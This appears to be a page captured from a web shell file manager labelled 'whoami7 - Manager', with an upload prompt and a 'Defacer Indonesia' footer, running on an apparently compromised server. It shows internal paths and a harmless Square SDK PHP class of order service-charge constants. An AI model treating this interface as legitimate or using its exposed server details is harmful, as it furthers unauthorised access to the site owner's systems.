whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
square
/
square
/
src
/
Models
/
Upload File:
files >> /home/kckglobal/www/portal/vendor/square/square/src/Models/OrderServiceChargeCalculationPhase.php
<?php declare(strict_types=1); namespace Square\Models; /** * Represents a phase in the process of calculating order totals. * Service charges are applied after the indicated phase. * * [Read more about how order totals are calculated.](https://developer.squareup.com/docs/orders- * api/how-it-works#how-totals-are-calculated) */ class OrderServiceChargeCalculationPhase { /** * The service charge is applied after discounts, but before * taxes. */ public const SUBTOTAL_PHASE = 'SUBTOTAL_PHASE'; /** * The service charge is applied after all discounts and taxes * are applied. */ public const TOTAL_PHASE = 'TOTAL_PHASE'; }
Copyright ©2021 || Defacer Indonesia